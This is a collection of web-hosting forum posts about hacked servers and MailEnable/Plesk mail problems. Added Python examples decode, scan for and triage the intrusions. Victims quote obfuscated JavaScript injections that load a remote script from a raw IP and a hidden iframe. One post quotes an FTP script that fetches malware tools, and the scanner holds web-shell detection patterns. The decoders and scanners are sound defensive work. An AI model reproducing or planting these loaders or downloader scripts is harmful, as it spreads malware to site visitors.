Malicious Mail Sent Out Via MailEnable On Localhost
Jun 5, 2008
We received a report of a malicious mail being sent from our servers. The problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs show that the connection was made from 127.0.0.1 to the SMTP service, but that's it.
We don't run mail services (POP3/IMAP/webmail) on the web servers, if that helps any. I have run out of ideas after sifting through lots of logs (I was trying to find whether anyone called an application to send the mail and attachments out), but came up empty.
Jul 9, 2008
I want to run a local mail server + webmail client (open source). I googled and found hMailServer [server] and Roundcube [webmail]. The problem is that I can't configure either of them.
Is there another alternative for a mail server, or a solution?
Jul 16, 2009
I have serious problems with ".cgi" files containing malicious code, with which the person who has these files sends spam through my server without any kind of block. Could I block this type of spam sending with ".cgi" files?
CentOS 5.2 - 64bits
WHM+cPanel
Example of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
Mar 18, 2009
We are having a problem with a number of our websites hosted on a Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2FscrRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites, as well as the above code being inserted into existing pages.
After removing the above code from one particular website, it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
May 11, 2009
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
Oct 27, 2008
All sites on my server have malicious code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
How do I locate this code in my sites using grep?
My server runs CentOS.
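Decoding the two injected loaders quoted on this page (the unescape()/replace() one from the Fasthosts post and the charCodeAt(i)-1 one from the CentOS post), as an added Python example that is not part of either post. The encoded strings are copied from the posts; the decoding mirrors what the browser would do, so the remote host can be pulled out and blocked or grepped for without ever running the script.

```python
import re
from urllib.parse import unquote

# Encoded strings copied from the two injected pages quoted on this forum.
# Sample 1: the unescape()/replace() loader from the Fasthosts post.
SAMPLE_UNESCAPE = (
    "xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6"
    "yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs"
    "crRMiiwqpzHVtwq%3E"
)
JUNK_TOKENS = ["yI", "zHV", "fW", "xXz", "RMi", "wq", "AEq"]

# Sample 2: the charCodeAt(i)-1 loader from the CentOS post.
SAMPLE_SHIFTED = (
    "=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2"
    "!gsbnfcpsefs>1?=0jgsbnf?"
)


def decode_unescape_replace(payload, junk):
    """Mirror unescape(payload).replace(/junk1|junk2|.../g, "").

    JS unescape() decodes %XX (and %uXXXX) sequences; urllib's unquote
    covers the %XX form, which is all this sample uses. Order matters:
    percent-decode first, then strip the junk tokens, exactly as the script does.
    """
    text = unquote(payload)
    pattern = re.compile("|".join(re.escape(t) for t in junk))
    return pattern.sub("", text)


def decode_charcode_shift(payload, shift=1):
    """Mirror String.fromCharCode(source.charCodeAt(i) - shift) over the string."""
    return "".join(chr(ord(ch) - shift) for ch in payload)


def extract_remote_hosts(html):
    """Pull the host out of every src= attribute (quoted or not, with or
    without a scheme) so the indicator can be grepped for and blocked."""
    return re.findall(r"""src=['"]?(?:https?:)?//([^/'"\s>]+)""", html)


def decode_both():
    """Decode both samples and return {decoded_html: [remote hosts]}."""
    loader1 = decode_unescape_replace(SAMPLE_UNESCAPE, JUNK_TOKENS)
    loader2 = decode_charcode_shift(SAMPLE_SHIFTED)
    return {page: extract_remote_hosts(page) for page in (loader1, loader2)}


if __name__ == "__main__":
    for page, hosts in decode_both().items():
        print(page, "->", hosts)
```

Both decoders are deliberately literal translations of the JavaScript rather than a generic deobfuscator: the point is to confirm what the script writes into the page (a remote script tag and a 1x1 iframe) and to get the host names as plain strings for a grep or a firewall rule.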
Jun 27, 2009
I am wanting to know if there is a way to stop malicious files being uploaded to my VPS via FTP, cPanel, etc.
I have been told there is a way to do this but I haven't been told how.
Basically I want to know if there is something where I can add a list of keywords that are in the malicious files, and whatever it is will stop them from being uploaded, or if they manage to get uploaded onto my VPS, will it make them not work?
I am looking into this as I had an issue before where someone uploaded a shell onto my server. Luckily it didn't cause any damage, or he didn't get anywhere, but I still want to be safe.
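A keyword/signature scanner of the kind this post, the mshell.php post and the "how do I grep for this" post above are asking about, written as an added Python example (not from any of the posts). The first three signatures are the literal fingerprints of the injections quoted on this page; the PHP web-shell markers are my assumptions, and the sample site it builds in a temp directory is constructed. It finds files after the fact, like a recursive grep with several patterns at once; blocking at upload time would need a hook in the FTP server or cPanel, which this does not show.

```python
import os
import re
import tempfile

# Signatures. The first three are the literal fingerprints of the injections
# quoted on this page; the PHP ones are generic web-shell markers and are my
# assumptions, not indicators taken from any post here.
SIGNATURES = {
    "js-charcode-shift": r"String\.fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*-\s*\d+\s*\)",
    "js-unescape-replace": r"unescape\(.*?\)\.replace\(/",
    "remote-script-ip": r"<script\s+src=['\"]?(?:https?:)?//\d{1,3}(?:\.\d{1,3}){3}/",
    "php-eval-b64": r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(",
    "php-shell-name": r"\b(?:FilesMan|c99shell|r57shell|Mulcishell)\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE | re.DOTALL) for name, rx in SIGNATURES.items()}
SCAN_EXT = {".html", ".htm", ".php", ".asp", ".js", ".cgi", ".pl", ".txt", ".inc"}


def scan_text(text):
    """Names of every signature that matches, in SIGNATURES order."""
    return [name for name, rx in COMPILED.items() if rx.search(text)]


def scan_tree(root):
    """Walk root like grep -rl would and return {relative/path: [signature names]}.

    Files are read as bytes and decoded leniently so a binary upload or a
    mis-encoded page does not abort the whole scan.
    """
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read().decode("utf-8", errors="replace")
            except OSError:
                continue
            found = scan_text(text)
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def build_sample_tree():
    """Constructed sample site for a stand-alone run; not real customer data."""
    root = tempfile.mkdtemp(prefix="scan-demo-")
    os.makedirs(os.path.join(root, "public_html", "cgi-bin"))
    # Clean page followed by the charCodeAt(i)-1 loader appended after </html>,
    # the shape shown in the CentOS post.
    with open(os.path.join(root, "public_html", "index.html"), "w") as fh:
        fh.write('<html><body>hello</body></html>\n'
                 '<html><body><script>var source ="=jgsbnf!tsd>(iuuq;00"; var result = "";\n'
                 'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);\n'
                 'document.write(result); </script></html></body>\n')
    with open(os.path.join(root, "public_html", "about.html"), "w") as fh:
        fh.write("<html><body>nothing to see</body></html>\n")
    # A minimal eval(base64_decode()) dropper; the base64 is just 'echo 1;'.
    with open(os.path.join(root, "public_html", "cgi-bin", "mshell.php"), "w") as fh:
        fh.write('<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n')
    return root


if __name__ == "__main__":
    for path, names in sorted(scan_tree(build_sample_tree()).items()):
        print(path, ":", ", ".join(names))
```

Point it at /home on a cPanel box (scan_tree("/home")) and it lists every customer file carrying one of the patterns; the keyword list is the part you extend as new injections turn up, and a match is a reason to look, not proof on its own.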
Jul 9, 2008
I've been having an issue with one of my sites where someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server and have already upgraded MySQL to the latest version as I thought that might work, but it hasn't.
Apr 5, 2009
For the first time in my site's life (a 10-year-old site) Google blocked it. When you type my site, Google says that my site has malicious code in it. As we found out, the problem in my site came from the company where I hosted it. We cleared all the files of the malicious code and now it's all OK. I want to ask if anyone knows from experience how many days until Google checks my site again to see if all is OK. Six hours ago I sent them, via Webmaster Tools, a request to examine my site again, but I don't know how they will do this. So I am asking any of you who have had the same experience. Any help will be appreciated. Please help me with anything you think might be useful for getting my site back in Google correctly!
Apr 30, 2009
We have been having a strange hacking problem on our server, and we cannot seem to find out how they are managing to accomplish it. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all HTML and PHP files on two hosting accounts that we operate. These two accounts are separate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add suPHP to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed suPHP.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment they cannot seem to pinpoint the problem. There also does not appear to be any indication in the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerability?
[url]
Mar 8, 2008
I decided to apply PHP safe mode to my servers, considering:
- I cannot prohibit the use of exec functions (some binaries are needed, like host, mysqldump, etc.)
- I cannot restrict at all via the UID/GID method on binaries due to several problems.
Safe mode is the final solution, as I only need the "safe_mode_exec_dir" setting to point to a folder with the necessary binaries... this will stop the nobody user (Apache) from executing whatever it wants, like perl, binaries uploaded to a public insecure folder (exploits), or anything else... people could only exec() the binaries I want and where I want. This will finally stop 95% of my hack problems.
Well. The problem is that safe_mode is either enabled or not, but you cannot set or disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure it so only "safe_mode_exec_dir" would apply, so:
- Include UID checks disabled by:
safe_mode_include_dir = "/home/"
(tested)
- Some variables set to NULL, such as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/"
Great! With symbolic links in it... the best solution available for me.
- open_basedir = "/home/"
(for fopen, etc...)
OK, OK... but there are problems, for example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great... fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir does not apply...
Now fopen, link, unlink, etc. functions are UID restricted and this seems to be impossible to disable... pffffffff...
Can you share your safe_mode configs or solutions for this problem?
Sep 18, 2008
I would like to set up a localhost server with a mail server too. I usually use Uniform Server as I find it very easy to get up and running and carry around with me. Are there any better solutions? I have found it difficult to get a mail server running on Uniform Server. Or maybe there are distributions that come with a mail server ready built in?
Dec 5, 2008
When I click the "Email Accounts" section in Helm I see "Failed to get Email Accounts"; I also can't add any new email account.
Helm Log:
Cannot create ActiveX component. at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName) at MailEnable.Administration.Mailbox.GetAutoResponderStatus() at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name) at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList() at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
Jun 18, 2007
Free antispam tool for my MailEnable mail server.
I have found Pinta, which claims to be antispam software for MailEnable mail servers.
Has anyone heard of them? Is it safe? Does it do the job?
If you know any other antispam software...
Feb 25, 2007
I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen a couple of dozen boxes getting infected because they had MailEnable Standard 1.95, for instance (or Professional 2.11), or anything else that's not up to date. The virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swamped by now. The biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95, where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed, and 5 minutes later the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable the MailEnable SMTP Relay Service. This is not a part of MailEnable, and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory, which does quite something to your server. Also check for the following:
C:\windows\system32\a.exe
C:\windows\system32\ot.exe
C:\windows\system32\w.exe
C:\windows\system32\gethashes.exe
C:\windows\system32\getsyskey.exe
C:\windows\system32\
c.exe
C:\windows\system32\rdriv.sys
C:\windows\system32\start.bat
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse)
user anonymous
anonymous@on.the.net
lcd c:\windows\system32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye
Nothing has been heard from SWsoft about this issue yet...
Jun 15, 2007
I have MailEnable free on a Windows server with Plesk 8.1.
I need IMAP, so I thought of hMail. The problem:
I need to copy all the mail content to hMail, as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some VBS from PMM, but that requires me to know all the account passwords and to do the backup/restore manually for all the emails.
Is there another way to switch to hMail without losing the mail content? (IMAPCopy is not an option as it needs IMAP, which is not present in MailEnable free, and it also needs all the passwords for all the accounts.)
Another problem: I do not have another Windows server, so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
Jul 9, 2009
SmarterMail 5.x is set up on one of our servers with Plesk 9.2. Just wondering how I configure a domain to use an external mail server.
For example, the domain mydomain.org is running its own external mail servers:
mail.mydomain.org
mail2.mydomain.org
In MailEnable I would do the following:
- Start | Programs | MailEnable Administrator
- MailEnable | MailEnable Management | Messaging Manager | Post Offices
- Expand the mydomain.org domain
- Right-click the Domains folder and choose 'Properties'
- Select the 'domain is disabled' checkbox
- Select the 'Act as Smart Host' checkbox
- In the 'Redirect mail to' text area enter the external mail server names:
mail.mydomain.org
mail2.mydomain.org
How can I configure SmarterMail to use the external mail servers of a domain?
Feb 16, 2007
I'm using the free edition of MailEnable and need to configure each post office to copy all incoming and outgoing email to one of the email accounts on the same post office.
Is there a way to configure this ?
I know I can configure mail forwarding on incoming mail per account, but I need to do it for all accounts (except the audit account).
e.g. anythinghere@dbnetsolutions.co.uk
incoming or outgoing would be copied to audit@dbnetsolutions.co.uk
Feb 22, 2007
My server running MailEnable is possibly sending out spam, because I've had a returned mail saying my IP is on a blacklist at CBL.
IP Address 64.X.X.10 was found in the CBL.
It was detected at 2007-02-17 13:00 GMT (+/- 30 minutes), approximately 5 days, 5 hours, 30 minutes ago.
However, when I checked my SMTP and POP logs I only see small amounts of mail that has been delivered.
When I run the netstat command I have the following connections. The ones to the .nl domain look strange.
C:\Documents and Settings\Administrator>netstat
Active Connections
Proto Local Address Foreign Address State
TCP server:telnet server.indis.nl:3409 CLOSE_WAIT
TCP server:telnet server.indis.nl:3410 CLOSE_WAIT
TCP server:epmap dsl10-037.express.oricom.ca:2253 ESTABLISHED
TCP server:1121 ipchicken.com:http CLOSE_WAIT
TCP server:1122 ipchicken.com:http CLOSE_WAIT
TCP server:1136 ipchicken.com:http CLOSE_WAIT
TCP server:1138 ipchicken.com:http CLOSE_WAIT
TCP server:1199 ecostumeshop.com:domain ESTABLISHED
TCP server:telnet server.indis.nl:3326 CLOSE_WAIT
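A quick triage of that netstat output, as an added Python example that is not part of the post: parse the rows, flag inbound sessions to local services an Internet-facing mail server should not be exposing (telnet, epmap) and outbound connections to what-is-my-IP sites, and count which foreign host keeps coming back to which service. The sample is constructed from the rows in the post; the baseline sets of "should not be exposed" services and IP-check sites are my assumptions.

```python
import re
from collections import Counter

# Constructed from the netstat output in the post above; hostnames as posted.
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address     Foreign Address                    State
  TCP    server:telnet     server.indis.nl:3409               CLOSE_WAIT
  TCP    server:telnet     server.indis.nl:3410               CLOSE_WAIT
  TCP    server:epmap      dsl10-037.express.oricom.ca:2253   ESTABLISHED
  TCP    server:1121       ipchicken.com:http                 CLOSE_WAIT
  TCP    server:1122       ipchicken.com:http                 CLOSE_WAIT
  TCP    server:1199       ecostumeshop.com:domain            ESTABLISHED
  TCP    server:telnet     server.indis.nl:3326               CLOSE_WAIT
"""

# Local services an Internet-facing mail/web host should not be accepting
# connections on (my assumption of a sane baseline, not from the post), and
# outbound destinations that only make sense for something asking "what is my IP".
EXPOSED_LOCAL = {"telnet", "epmap", "netbios-ssn", "microsoft-ds"}
IP_CHECK_SITES = {"ipchicken.com"}
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\S+)\s+(\S+):(\S+)(?:\s+(\S+))?")


def parse_netstat(text):
    """Turn the Windows netstat table into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, lhost, lport, fhost, fport, state = m.groups()
            rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                         "fhost": fhost, "fport": fport, "state": state or ""})
    return rows


def triage(rows):
    """Return (row, reason) for every connection that needs an explanation.

    A local port named telnet/epmap means the remote side connected *to* us on
    that service; a foreign host on an IP-check site means something on this
    box is looking up its own public address.
    """
    findings = []
    for r in rows:
        if r["lport"] in EXPOSED_LOCAL:
            findings.append((r, "inbound %s session from %s: service should not be reachable"
                             % (r["lport"], r["fhost"])))
        elif r["fhost"] in IP_CHECK_SITES:
            findings.append((r, "outbound to %s: something local is looking up its public IP"
                             % r["fhost"]))
    return findings


def peers_by_service(rows):
    """Count (local service, foreign host) pairs to see who keeps coming back."""
    return Counter((r["lport"], r["fhost"]) for r in rows)


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_OUTPUT)
    for r, reason in triage(rows):
        print(r["proto"], r["lhost"] + ":" + r["lport"], "<->", r["fhost"] + ":" + r["fport"], "|", reason)
    print(peers_by_service(rows).most_common(3))
```

On the live box run netstat -ano instead and carry the PID column through the same parser; the PID is what ties a flagged connection to the process that owns it.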
Oct 16, 2013
Next error:
C:\Windows>"%plesk_bin%\mchk.exe" --all --fix=all
Data error (cyclic redundancy check). (Error code 23) at BCryptDecrypt()
I restored all mail accounts from backup and used this command: "%plesk_bin%\mchk.exe" --all --fix=all
How can I fix this?
Nov 7, 2013
Are there any limits using MailEnable regarding hosting? How many domains (or maximum users) can it serve?
I come from a Merak mail server solution... with about 400 domains and 3000 users... and I must admit that the server has had some problems.
Plesk provides MailEnable Standard edition... but according to the Feature Comparison, IMAP should not be present in this version???
[URL] ....
Can I use IMAP for customers?
Nov 5, 2014
My system is a Windows Server 2012 R2 with Plesk 12.
On this system I have installed MailEnable as my mail server.
So at the moment something is spamming on this server, but I can't find out who it is.
Received: from win02.XXXXXX([MY IP] helo=WIN02.home)
(envelope-from <root@XXXXXXXX>)
id 1XlyHP-00038b-R0
for x; Wed, 05 Nov 2014 11:57:37 +0100
[Code].....
The header means that the spam comes from root@, but there is no account with the name root@...
On Linux it is so easy to find the spam with qmail or Postfix. Why is it so difficult with MailEnable?
Mar 8, 2015
Plesk Windows 12, MailEnable mailserver
I added users directly to MailEnable (using their migration utility to import from an old mail server which Plesk does not support). The domains exist in Plesk but not the individual email users/mailboxes.
Now I want to add those email users to Plesk but it doesn't let me (not surprisingly); when I try to add a user it returns an error: "Unable to update the mail account properties:mailmng failed: MEAOPO.Mailbox.AddMailbox failed"
My question is: how can I add the users that already exist in MailEnable to the Plesk configuration? (i.e. ignore the error and add the user to the Plesk database, or even better, if Plesk can read the configuration and add all users)
The Plesk KB articles suggest running mchk.exe, but that is designed to take users from Plesk and add them to MailEnable; I need the reverse.
Sep 19, 2012
Is there a way to configure the mailing lists created with Plesk (using MailEnable 6.5) via Plesk or another web interface, like it is possible with Mailman under Linux?
It is not very convenient to be required to do such stuff via RDP (and so manually by me for every customer)...
Jan 19, 2014
I have been a Plesk Panel user for several years and I found PPA very interesting because of its great scalability.
It has been time consuming to figure out how PPA handles several Plesk Panel aspects.
Does PPA have support for MailEnable disk usage calculation? If it does, where? And how often does it collect disk usage info from the Mail Service Node?
Sep 19, 2013
I use Windows Plesk v11.5.30 with MailEnable Standard Edition 7.0. On the MailEnable site I saw a new version of MailEnable Standard edition (7.5.1). URL... Can I download and update the MailEnable version of my Windows Plesk? If I make this change and have problems, can I downgrade later?
Aug 2, 2013
A few months ago my MailEnable Postoffice Connector started stopping every hour. Sometimes more than an hour, sometimes less.
I updated my Plesk to the latest version, 11.5.30, but it still has the problem.
When this happens the email clients work without receiving any message until I start the MailEnable Postoffice Connector again.
I'm losing a lot of clients because of this.
I use Microsoft Windows Server 2008 with all updates installed.
[URL]....
Mar 20, 2014
I have 2 webspaces on my server, www.a.com and www.b.com.
I initially set up www.a.com; everything works fine and I can access the emails for a.com through webmail.a.com.
Then I set up www.b.com using almost identical DNS settings, except that each domain has its own dedicated IP.
Now, the problem is I am not able to access webmail.b.com; the error message is "server not found". Why is this?
It seems that I can only access the emails for b.com using webmail.a.com.
I have MailEnable version 8 Standard installed...
Oct 10, 2014
I manage a Linux Apache web server with a few WordPress blogs, and from time to time I see someone inject a malicious .php file into the wp-content/uploads/2014/10/ directory.
I think it's some bad plugin or theme, but there are more blogs; I upgrade and update WP, but...
How can I set up some monitor to tell me which PHP file (or even which line in the PHP file) injected that malicious .php? I have Linux root access so I can set up anything.
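One way to answer "which request wrote that file", as an added Python example that is not from the post: take the injected file's timestamp and pull the access-log requests from the seconds around it, with POST/PUT requests to PHP sorted first because a write under uploads/ almost always comes from a request that carried a body; then find the first request for the dropped file itself, which is the attacker coming back to use it. The log lines and the file timestamp are constructed, and the admin-ajax action name is a hypothetical stand-in for whatever plugin endpoint was abused.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log line; only time, client, method, path and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample access log (not from any real server). The admin-ajax
# action name is hypothetical and stands for whatever plugin endpoint is abused.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2014:03:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2014:03:14:09 +0000] "POST /wp-admin/admin-ajax.php?action=some_plugin_upload HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Oct/2014:03:14:11 +0000] "GET /2014/10/hello-world/ HTTP/1.1" 200 9322 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2014:03:14:13 +0000] "GET /wp-content/uploads/2014/10/x.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Oct/2014:03:20:00 +0000] "GET /feed/ HTTP/1.1" 200 4100 "-" "FeedFetcher"
"""

# When the injected file appeared. On the box this comes from
# os.stat(path).st_mtime (or 'stat -c %y'); fixed here so the demo runs offline.
SAMPLE_CREATED = datetime(2014, 10, 10, 3, 14, 10, tzinfo=timezone.utc)
INJECTED_PATH = "/wp-content/uploads/2014/10/x.php"


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def parse_log(text):
    return [e for e in (parse_line(line) for line in text.splitlines()) if e]


def requests_around(entries, created_at, before=120, after=5):
    """Requests in the window around the file's timestamp, most likely writer first.

    A file under uploads/ is almost always written by a request that carried a
    body, so POST/PUT sort first; within each group, oldest first.
    """
    lo, hi = created_at - timedelta(seconds=before), created_at + timedelta(seconds=after)
    window = [e for e in entries if lo <= e["time"] <= hi]
    window.sort(key=lambda e: (e["method"] not in ("POST", "PUT"), e["time"]))
    return window


def first_hit(entries, path):
    """The first request for the injected file itself: who came back to use it."""
    for e in sorted(entries, key=lambda e: e["time"]):
        if e["path"].split("?", 1)[0] == path:
            return e
    return None


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for e in requests_around(entries, SAMPLE_CREATED):
        print(e["time"].isoformat(), e["ip"], e["method"], e["path"])
    print("first use:", first_hit(entries, INJECTED_PATH))
```

The request URL is what names the plugin or theme file at fault; the access log alone cannot name the PHP line. For an exact write time and the PID that did it, add an auditd watch on the uploads directory (auditctl -w /path/to/wp-content/uploads -p wa -k wp_uploads, path assumed) and feed that timestamp into requests_around instead of the file's mtime, which an attacker can reset.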